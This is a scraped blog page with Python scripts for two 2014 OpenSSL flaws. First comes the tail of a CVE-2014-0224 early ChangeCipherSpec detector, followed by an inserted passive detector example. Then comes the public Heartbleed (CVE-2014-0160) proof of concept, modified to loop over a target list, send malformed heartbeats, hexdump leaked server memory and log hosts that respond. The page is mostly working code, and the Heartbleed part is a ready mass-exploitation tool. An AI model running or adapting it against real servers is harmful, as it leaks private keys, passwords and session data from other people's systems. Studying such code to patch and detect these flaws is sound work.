ssl3_cipher['\x00\x81'] = "TLS_GOSTR341001_WITH_28147_CNT_IMIT"
ssl3_cipher['\x00\x82'] = "TLS_GOSTR341094_WITH_NULL_GOSTR3411"
ssl3_cipher['\x00\x83'] = "TLS_GOSTR341001_WITH_NULL_GOSTR3411"
ssl3_cipher['\x00\x84'] = "TLS_RSA_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x85'] = "TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x86'] = "TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x87'] = "TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x88'] = "TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x89'] = "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x8A'] = "TLS_PSK_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x8B'] = "TLS_PSK_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x8C'] = "TLS_PSK_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x8D'] = "TLS_PSK_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x8E'] = "TLS_DHE_PSK_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x8F'] = "TLS_DHE_PSK_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x90'] = "TLS_DHE_PSK_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x91'] = "TLS_DHE_PSK_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x92'] = "TLS_RSA_PSK_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x93'] = "TLS_RSA_PSK_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x94'] = "TLS_RSA_PSK_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x95'] = "TLS_RSA_PSK_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x96'] = "TLS_RSA_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x97'] = "TLS_DH_DSS_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x98'] = "TLS_DH_RSA_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x99'] = "TLS_DHE_DSS_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x9A'] = "TLS_DHE_RSA_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x9B'] = "TLS_DH_anon_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x9C'] = "TLS_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\x9D'] = "TLS_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\x9E'] = "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\x9F'] = "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA0'] = "TLS_DH_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA1'] = "TLS_DH_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA2'] = "TLS_DHE_DSS_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA3'] = "TLS_DHE_DSS_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA4'] = "TLS_DH_DSS_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA5'] = "TLS_DH_DSS_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA6'] = "TLS_DH_anon_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA7'] = "TLS_DH_anon_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA8'] = "TLS_PSK_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA9'] = "TLS_PSK_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xAA'] = "TLS_DHE_PSK_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xAB'] = "TLS_DHE_PSK_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xAC'] = "TLS_RSA_PSK_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xAD'] = "TLS_RSA_PSK_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xAE'] = "TLS_PSK_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\xAF'] = "TLS_PSK_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\x00\xB0'] = "TLS_PSK_WITH_NULL_SHA256"
ssl3_cipher['\x00\xB1'] = "TLS_PSK_WITH_NULL_SHA384"
ssl3_cipher['\x00\xB2'] = "TLS_DHE_PSK_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\xB3'] = "TLS_DHE_PSK_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\x00\xB4'] = "TLS_DHE_PSK_WITH_NULL_SHA256"
ssl3_cipher['\x00\xB5'] = "TLS_DHE_PSK_WITH_NULL_SHA384"
ssl3_cipher['\x00\xB6'] = "TLS_RSA_PSK_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\xB7'] = "TLS_RSA_PSK_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\x00\xB8'] = "TLS_RSA_PSK_WITH_NULL_SHA256"
ssl3_cipher['\x00\xB9'] = "TLS_RSA_PSK_WITH_NULL_SHA384"
ssl3_cipher['\x00\xBA'] = "TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBB'] = "TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBC'] = "TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBD'] = "TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBE'] = "TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBF'] = "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xC0'] = "TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC1'] = "TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC2'] = "TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC3'] = "TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC4'] = "TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC5'] = "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\x00'] = "TLS_EMPTY_RENEGOTIATION_INFO_SCSV"
ssl3_cipher['\xc0\x01'] = "TLS_ECDH_ECDSA_WITH_NULL_SHA"
ssl3_cipher['\xc0\x02'] = "TLS_ECDH_ECDSA_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x03'] = "TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x04'] = "TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x05'] = "TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xc0\x06'] = "TLS_ECDHE_ECDSA_WITH_NULL_SHA"
ssl3_cipher['\xc0\x07'] = "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x08'] = "TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x09'] = "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x0a'] = "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xc0\x0b'] = "TLS_ECDH_RSA_WITH_NULL_SHA"
ssl3_cipher['\xc0\x0c'] = "TLS_ECDH_RSA_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x0d'] = "TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x0e'] = "TLS_ECDH_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x0f'] = "TLS_ECDH_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xc0\x10'] = "TLS_ECDHE_RSA_WITH_NULL_SHA"
ssl3_cipher['\xc0\x11'] = "TLS_ECDHE_RSA_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x12'] = "TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x13'] = "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x14'] = "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xc0\x15'] = "TLS_ECDH_anon_WITH_NULL_SHA"
ssl3_cipher['\xc0\x16'] = "TLS_ECDH_anon_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x17'] = "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x18'] = "TLS_ECDH_anon_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x19'] = "TLS_ECDH_anon_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x1A'] = "TLS_SRP_SHA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xC0\x1B'] = "TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xC0\x1C'] = "TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xC0\x1D'] = "TLS_SRP_SHA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xC0\x1E'] = "TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xC0\x1F'] = "TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xC0\x20'] = "TLS_SRP_SHA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x21'] = "TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x22'] = "TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x23'] = "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x24'] = "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x25'] = "TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x26'] = "TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x27'] = "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x28'] = "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x29'] = "TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x2A'] = "TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x2B'] = "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\xC0\x2C'] = "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\xC0\x2D'] = "TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\xC0\x2E'] = "TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\xC0\x2F'] = "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\xC0\x30'] = "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\xC0\x31'] = "TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\xC0\x32'] = "TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\xC0\x33'] = "TLS_ECDHE_PSK_WITH_RC4_128_SHA"
ssl3_cipher['\xC0\x34'] = "TLS_ECDHE_PSK_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xC0\x35'] = "TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xC0\x36'] = "TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x37'] = "TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x38'] = "TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x39'] = "TLS_ECDHE_PSK_WITH_NULL_SHA"
ssl3_cipher['\xC0\x3A'] = "TLS_ECDHE_PSK_WITH_NULL_SHA256"
ssl3_cipher['\xC0\x3B'] = "TLS_ECDHE_PSK_WITH_NULL_SHA384"
ssl3_cipher['\xfe\xfe'] = "SSL_RSA_FIPS_WITH_DES_CBC_SHA"
ssl3_cipher['\xfe\xff'] = "SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xff\xe0'] = "SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xff\xe1'] = "SSL_RSA_FIPS_WITH_DES_CBC_SHA"

def getSSLRecords(strBuf):
    # Returns a list of (content_type, handshake_type) pairs found in strBuf.
    lstRecords = []
    if len(strBuf)>=9:
        sslStatus = struct.unpack('>BHHI', strBuf[0:9])
        iType = (sslStatus[3] & (0xFF000000))>>24
        iRecordLen = sslStatus[3] & (0x00FFFFFF)
        iShakeProtocol = sslStatus[0]
        iSSLLen = sslStatus[2]
        #log(2,"iSSLLen == %d, len(strBuf) == %d, iRecordLen == %d",iSSLLen,len(strBuf),iRecordLen)
        if (iRecordLen + 5 < iSSLLen):
            #log(2,"Multiple Handshakes")
            lstRecords.append((iShakeProtocol,iType))
            iLoopStopper = 0
            iNextOffset = iRecordLen + 9
            while iNextOffset < len(strBuf):
                iLoopStopper += 1
                # The original tool waited here for more data from its scanner
                # engine (rule.waitForData()); as a standalone script we stop at
                # the end of the buffer we already have.
                if ((iNextOffset+4) > len(strBuf)):
                    #log(2,"End of message")
                    break
                iTypeAndLen = struct.unpack(">I",strBuf[iNextOffset:iNextOffset+4])[0]
                iRecordLen = iTypeAndLen & (0x00FFFFFF)
                iType = (iTypeAndLen & (0xFF000000))>>24
                lstRecords.append((iShakeProtocol,iType))
                iNextOffset += (iRecordLen + 4)
                if iLoopStopper > 8:
                    break
            return lstRecords
        elif (iRecordLen + 9 < len(strBuf)):
            #log(2,"Multiple Records")
            lstRecords.append((iShakeProtocol,iType))
            iNextOffset = iRecordLen + 9
            iLoopStopper = 0
            while iNextOffset+6 < len(strBuf):
                iLoopStopper += 1
                iShakeProtocol = struct.unpack(">B",strBuf[iNextOffset])[0]
                iRecordLen = struct.unpack(">H",strBuf[iNextOffset+3:iNextOffset+5])[0]
                iType = struct.unpack(">B",strBuf[iNextOffset+5])[0]
                #log(2,"iShakeProto == %d, iRecordLen == %d, iType == %d",iShakeProtocol,iRecordLen,iType)
                lstRecords.append((iShakeProtocol,iType))
                iNextOffset += iRecordLen + 5
                if iLoopStopper > 8:
                    break
            return lstRecords
        elif (iRecordLen + 9 == len(strBuf)):
            #log(2,"Single record")
            sslStatus = checkSSLHeader(strBuf)
            lstRecords.append((sslStatus[0],sslStatus[2]))
            return lstRecords
    return None

def checkSSLHeader(strBuf):
    # Parses the 5-byte record header plus the 4-byte handshake header.
    if len(strBuf)>=9:
        sslStatus = struct.unpack('>BHHI', strBuf[0:9])
        iType = (sslStatus[3] & (0xFF000000))>>24
        iRecordLen = sslStatus[3] & (0x00FFFFFF)
        iShakeProtocol = sslStatus[0]
        iSSLLen = sslStatus[2]
        return (iShakeProtocol,iSSLLen,iType,iRecordLen)
    return None

def makeHello(strSSLVer):
    # Builds a ClientHello record offering every cipher suite in ssl3_cipher.
    r = "\x16" # Message Type 22
    r += dSSL[strSSLVer]
    strCiphers = ""
    for c in ssl3_cipher.keys():
        strCiphers += c
    dLen = 43 + len(strCiphers)
    r += struct.pack("!H",dLen)
    h = "\x01"
    strPlen = struct.pack("!L",dLen-4)
    h+=strPlen[1:]
    h+= dSSL[strSSLVer]
    rand = struct.pack("!L", int(time.time()))
    rand += "\x36\x24\x34\x16\x27\x09\x22\x07\xd7\xbe\xef\x69\xa1\xb2"
    rand += "\x37\x23\x14\x96\x27\xa9\x12\x04\xe7\xce\xff\xd9\xae\xbb"
    h+=rand
    h+= "\x00" # No Session ID
    h+=struct.pack("!H",len(strCiphers))
    h+=strCiphers
    h+= "\x01\x00"
    return r+h

iVulnCount = 0
for strVer in ["TLSv1.2","TLSv1.1","TLSv1","SSLv3"]:
    strHello = makeHello(strVer)
    strLogPre = "[%s] %s:%d" % (strVer,strHost,iPort)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((strHost,iPort))
        s.settimeout(5)
    except:
        print "Failure connecting to %s:%d." % (strHost,iPort)
        quit()
    s.send(strHello)
    #print "Sending %s Client Hello" % (strVer)
    iCount = 0
    fServerHello = False
    fCert = False
    fKex = False
    fHelloDone = False
    while iCount<5:
        iCount += 1
        try:
            recv = s.recv(2048)
        except:
            continue
        lstRecords = getSSLRecords(recv)
        #strLogMessage = "iCount = %d; lstRecords = %s" % (iCount,lstRecords)
        #log(2,strLogMessage)
        if lstRecords != None and len(lstRecords) > 0:
            for (iShakeProtocol,iType) in lstRecords:
                if iShakeProtocol == 22:
                    if iType == 2:
                        fServerHello = True
                    elif iType == 11:
                        fCert = True
                    elif iType == 12:
                        fKex = True
                    elif iType == 14:
                        fHelloDone = True
            if (fServerHello and fCert):
                break
        else:
            #log(2, "Handshake missing or invalid. Aborting.")
            continue
    if not (fServerHello and fCert):
        print "%s Invalid handshake." % (strLogPre)
    elif len(recv)>0:
        #print "Received %d bytes. (%d)" % (len(recv),ord(recv[0]))
        if ord(recv[0])==22:
            iCount = 0
            strChangeCipherSpec = "\x14"
            strChangeCipherSpec += dSSL[strVer]
            strChangeCipherSpec += "\x00\x01" # Len
            strChangeCipherSpec += "\x01" # Payload CCS
            #print "Sending Change Cipher Spec"
            s.send(strChangeCipherSpec)
            fVuln = True
            strLastMessage = ""
            while iCount < 5:
                iCount += 1
                s.settimeout(0.5)
                try:
                    recv = s.recv(2048)
                except socket.timeout:
                    #print "Timeout waiting for CCS reply."
                    continue
                if (len(recv)>0):
                    strLastMessage = recv
                    if (ord(recv[0])==21):
                        fVuln = False
                        break
            try:
                if ord(strLastMessage[-7]) == 21: # Check if an alert was at the end of the last message.
                    fVuln=False
            except IndexError:
                pass
            if fVuln:
                print "[%s] %s:%d allows early CCS" % (strVer,strHost,iPort)
                iVulnCount += 1
            else:
                print "[%s] %s:%d rejected early CCS" % (strVer,strHost,iPort)
        else:
            print "[%s] No response from %s:%d" % (strVer,strHost,iPort)
    try:
        s.close()
    except:
        pass

if iVulnCount > 0:
    print "***This System Exhibits Potentially Vulnerable Behavior***"
    quit(1)
else:
    print "No need to patch."
    quit(0)
</code></pre>
<span style="font-family: inherit;"><span style="background-color: white;"><br /></span>
</span><br />
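The detection script above decides "vulnerable" from how the server reacts to a ChangeCipherSpec sent before the key exchange. The same record-ordering logic can be applied passively to a captured handshake, which is how a network monitor would flag the condition. The Python 3 code below is an added example written for this page, not the Tripwire tool or anything from the original post; it assumes a TLS 1.2 byte stream with both directions concatenated in order, and the sample flows are constructed inline.

```python
import struct

# TLS record content types and handshake message types (RFC 5246 numbering).
CHANGE_CIPHER_SPEC, ALERT, HANDSHAKE = 20, 21, 22
SERVER_HELLO, CERTIFICATE, SERVER_HELLO_DONE, CLIENT_KEY_EXCHANGE = 2, 11, 14, 16


def parse_tls_records(buf):
    """Split a byte buffer into TLS records as (content_type, version, payload).

    A trailing record whose declared length exceeds the data present is left
    unparsed (the complete records are returned) rather than raising.
    """
    records, off = [], 0
    while off + 5 <= len(buf):
        ctype, version, length = struct.unpack(">BHH", buf[off:off + 5])
        if off + 5 + length > len(buf):
            break  # partial record: the caller should read more data first
        records.append((ctype, version, buf[off + 5:off + 5 + length]))
        off += 5 + length
    return records


def parse_handshakes(payload):
    """Split a Handshake record payload into (msg_type, body) pairs.

    One record may carry several handshake messages (ServerHello, Certificate
    and ServerHelloDone are commonly coalesced), each with a 1-byte type and a
    3-byte big-endian length.
    """
    msgs, off = [], 0
    while off + 4 <= len(payload):
        msg_type = payload[off]
        length = int.from_bytes(payload[off + 1:off + 4], "big")
        if off + 4 + length > len(payload):
            break
        msgs.append((msg_type, payload[off + 4:off + 4 + length]))
        off += 4 + length
    return msgs


def find_early_ccs(flow):
    """Return True if a ChangeCipherSpec precedes the ClientKeyExchange in a flow.

    In a correct handshake neither side switches to the pending cipher state
    before the client has sent its key exchange. A CCS seen earlier than that
    is the condition CVE-2014-0224 detection looks for, whether actively (the
    script above) or passively over a captured byte stream (here).
    """
    client_kex_seen = False
    for ctype, _version, payload in parse_tls_records(flow):
        if ctype == HANDSHAKE:
            if any(t == CLIENT_KEY_EXCHANGE for t, _ in parse_handshakes(payload)):
                client_kex_seen = True
        elif ctype == CHANGE_CIPHER_SPEC and not client_kex_seen:
            return True
    return False


def tls_record(ctype, payload, version=b"\x03\x03"):
    """Assemble one TLS record (used only to build the constructed samples)."""
    return bytes([ctype]) + version + struct.pack(">H", len(payload)) + payload


def handshake_msg(msg_type, body):
    """Assemble one handshake message: 1-byte type, 3-byte length, body."""
    return bytes([msg_type]) + len(body).to_bytes(3, "big") + body


# Constructed sample flows (not captured traffic). The server's first flight is
# three handshake messages coalesced into one record, as real servers send it.
SERVER_FLIGHT = tls_record(HANDSHAKE,
    handshake_msg(SERVER_HELLO, b"\x03\x03" + b"\x00" * 32 + b"\x00" + b"\xc0\x2f" + b"\x00")
    + handshake_msg(CERTIFICATE, b"\x00\x00\x00")
    + handshake_msg(SERVER_HELLO_DONE, b""))
CLIENT_KEX = tls_record(HANDSHAKE, handshake_msg(CLIENT_KEY_EXCHANGE, b"\x00\x20" + b"\x11" * 32))
CCS = tls_record(CHANGE_CIPHER_SPEC, b"\x01")

NORMAL_FLOW = SERVER_FLIGHT + CLIENT_KEX + CCS     # CCS after the key exchange: fine
EARLY_CCS_FLOW = SERVER_FLIGHT + CCS + CLIENT_KEX  # CCS before the key exchange: flag it

if __name__ == "__main__":
    for name, flow in (("normal", NORMAL_FLOW), ("early-ccs", EARLY_CCS_FLOW)):
        types = [t for t, _, _ in parse_tls_records(flow)]
        print("%-10s record types=%s early CCS: %s" % (name, types, find_early_ccs(flow)))
```

The parser deliberately stops at a truncated record instead of raising, because on a live socket the remainder of the record is usually still in flight; the Tripwire code above handles the same situation with its loop counters.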
<b><span style="font-family: inherit;">
<span style="background-color: white;">Reference:</span></span></b><br />
<span style="font-family: inherit;">- http://www.tripwire.com/state-of-security/incident-detection/detection-script-for-cve-2014-0224-openssl-cipher-change-spec-injection/</span><br />
<span style="font-family: inherit;">- http://www.openssl.org/news/secadv_20140605.txt</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><span style="background-color: white;">Thanks.</span> </span>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-43649847022133280072014-04-09T15:35:00.001+08:002014-04-10T01:15:20.656+08:00A OpenSSL HeartBleed vulnerability Python<span style="font-family: inherit;">As you know, on 8 April 2014 a zero-day bug in OpenSSL, called Heartbleed, was disclosed as a security vulnerability.</span><br />
<span style="font-family: inherit;">An attacker could obtain chunks of the server's memory using this vulnerability.</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div style="font-size: 12pt; margin-bottom: 3.75pt; margin-right: 0cm;">
<span lang="EN-US" style="font-size: 11pt;"><span style="font-family: inherit;">Affected OpenSSL versions:</span></span></div>
<div style="font-size: 12pt; margin-bottom: 3.75pt; margin-right: 0cm;">
<span lang="EN-US" style="font-size: 11pt;"><span style="font-family: inherit;">OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable</span></span></div>
<span style="font-family: inherit;"><span lang="EN-US" style="font-size: 11pt;">OpenSSL 1.0.1g is NOT vulnerable</span></span><br />
<span style="font-family: inherit;"><span lang="EN-US" style="font-size: 11pt;">OpenSSL 1.0.0 branch is NOT vulnerable</span></span><br />
<span style="font-family: inherit;"><span lang="EN-US" style="font-size: 11pt;">OpenSSL 0.9.8 branch is NOT vulnerable</span></span><br />
<br />
<div style="font-size: 12pt; margin-bottom: 3.75pt; margin-right: 0cm;">
<span lang="EN-US" style="font-size: 11pt;"><br /></span></div>
<div style="font-size: 12pt; margin-bottom: 3.75pt; margin-right: 0cm;">
<span lang="EN-US" style="font-size: 11pt;">I needed to check servers, so I modified the exploit to check lots of servers.</span></div>
<div style="font-size: 12pt; margin-bottom: 3.75pt; margin-right: 0cm;">
<span lang="EN-US" style="font-size: 11pt;"><br /></span></div>
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

'''
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
'''

def ip_n_port(i):
    # Each line of lists.txt is "ip:port"; drop the newline and any spaces first.
    data = str(i).strip().replace(" ", "")
    data = data.split(":")
    ip = data[0]
    port = data[1]
    return ip, port

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s, ip, port):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False
        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'ip: %s, port: %s' % (ip, port)
                fp = open('result.txt', 'a')
                fp.write('%s:%s\n' % (ip, port))
                fp.close()
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True
        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False

def main(ip, port):
    '''
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return
    '''
    print ip, port
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((ip, int(port)))
    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break
    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s, ip, port)

if __name__ == '__main__':
    f = open("lists.txt", "r")
    for i in f:
        ip, port = ip_n_port(i)
        try:
            main(ip, port)
        except:
            print ('no connection')
    f.close()
</code></pre>
<br />
The file lists.txt holds the targets to check, one per line, in the form "ip:port".<br />
e.g.,<br />
1111:443<br />
2222:8443<br />
